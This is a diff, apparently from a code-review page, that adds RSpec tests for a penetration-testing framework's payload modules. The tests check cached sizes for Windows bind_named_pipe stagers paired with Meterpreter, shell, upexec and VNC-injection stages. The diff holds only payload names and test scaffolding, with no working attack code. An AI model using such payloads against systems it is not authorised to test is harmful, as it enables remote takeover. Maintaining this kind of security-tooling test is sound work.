|
||||||
ancestor_reference_names: [
|
ancestor_reference_names: [
|
||||||
|
@ -3377,6 +3410,17 @@ RSpec.describe 'modules/payloads', :content do
|
||||||
reference_name: 'windows/patchupmeterpreter/bind_ipv6_tcp'
|
reference_name: 'windows/patchupmeterpreter/bind_ipv6_tcp'
|
||||||
end
|
end
|
||||||
|
|
||||||
|
context 'windows/patchupmeterpreter/bind_named_pipe' do
|
||||||
|
it_should_behave_like 'payload cached size is consistent',
|
||||||
|
ancestor_reference_names: [
|
||||||
|
'stagers/windows/bind_named_pipe',
|
||||||
|
'stages/windows/patchupmeterpreter'
|
||||||
|
],
|
||||||
|
dynamic_size: false,
|
||||||
|
modules_pathname: modules_pathname,
|
||||||
|
reference_name: 'windows/patchupmeterpreter/bind_named_pipe'
|
||||||
|
end
|
||||||
|
|
||||||
context 'windows/patchupmeterpreter/bind_nonx_tcp' do
|
context 'windows/patchupmeterpreter/bind_nonx_tcp' do
|
||||||
it_should_behave_like 'payload cached size is consistent',
|
it_should_behave_like 'payload cached size is consistent',
|
||||||
ancestor_reference_names: [
|
ancestor_reference_names: [
|
||||||
|
@ -3531,6 +3575,17 @@ RSpec.describe 'modules/payloads', :content do
|
||||||
reference_name: 'windows/shell/bind_ipv6_tcp'
|
reference_name: 'windows/shell/bind_ipv6_tcp'
|
||||||
end
|
end
|
||||||
|
|
||||||
|
context 'windows/shell/bind_named_pipe' do
|
||||||
|
it_should_behave_like 'payload cached size is consistent',
|
||||||
|
ancestor_reference_names: [
|
||||||
|
'stagers/windows/bind_named_pipe',
|
||||||
|
'stages/windows/shell'
|
||||||
|
],
|
||||||
|
dynamic_size: false,
|
||||||
|
modules_pathname: modules_pathname,
|
||||||
|
reference_name: 'windows/shell/bind_named_pipe'
|
||||||
|
end
|
||||||
|
|
||||||
context 'windows/shell/bind_nonx_tcp' do
|
context 'windows/shell/bind_nonx_tcp' do
|
||||||
it_should_behave_like 'payload cached size is consistent',
|
it_should_behave_like 'payload cached size is consistent',
|
||||||
ancestor_reference_names: [
|
ancestor_reference_names: [
|
||||||
|
@ -3735,6 +3790,17 @@ RSpec.describe 'modules/payloads', :content do
|
||||||
reference_name: 'windows/upexec/bind_ipv6_tcp'
|
reference_name: 'windows/upexec/bind_ipv6_tcp'
|
||||||
end
|
end
|
||||||
|
|
||||||
|
context 'windows/upexec/bind_named_pipe' do
|
||||||
|
it_should_behave_like 'payload cached size is consistent',
|
||||||
|
ancestor_reference_names: [
|
||||||
|
'stagers/windows/bind_named_pipe',
|
||||||
|
'stages/windows/upexec'
|
||||||
|
],
|
||||||
|
dynamic_size: false,
|
||||||
|
modules_pathname: modules_pathname,
|
||||||
|
reference_name: 'windows/upexec/bind_named_pipe'
|
||||||
|
end
|
||||||
|
|
||||||
context 'windows/upexec/bind_nonx_tcp' do
|
context 'windows/upexec/bind_nonx_tcp' do
|
||||||
it_should_behave_like 'payload cached size is consistent',
|
it_should_behave_like 'payload cached size is consistent',
|
||||||
ancestor_reference_names: [
|
ancestor_reference_names: [
|
||||||
|
@ -3889,6 +3955,17 @@ RSpec.describe 'modules/payloads', :content do
|
||||||
reference_name: 'windows/vncinject/bind_ipv6_tcp'
|
reference_name: 'windows/vncinject/bind_ipv6_tcp'
|
||||||
end
|
end
|
||||||
|
|
||||||
|
context 'windows/vncinject/bind_named_pipe' do
|
||||||
|
it_should_behave_like 'payload cached size is consistent',
|
||||||
|
ancestor_reference_names: [
|
||||||
|
'stagers/windows/bind_named_pipe',
|
||||||
|
'stages/windows/vncinject'
|
||||||
|
],
|
||||||
|
dynamic_size: false,
|
||||||
|
modules_pathname: modules_pathname,
|
||||||
|
reference_name: 'windows/vncinject/bind_named_pipe'
|
||||||
|
end
|
||||||
|
|
||||||
context 'windows/vncinject/bind_nonx_tcp' do
|
context 'windows/vncinject/bind_nonx_tcp' do
|
||||||
it_should_behave_like 'payload cached size is consistent',
|
it_should_behave_like 'payload cached size is consistent',
|
||||||
ancestor_reference_names: [
|
ancestor_reference_names: [
|
||||||
|
|
Loading…
Reference in New Issue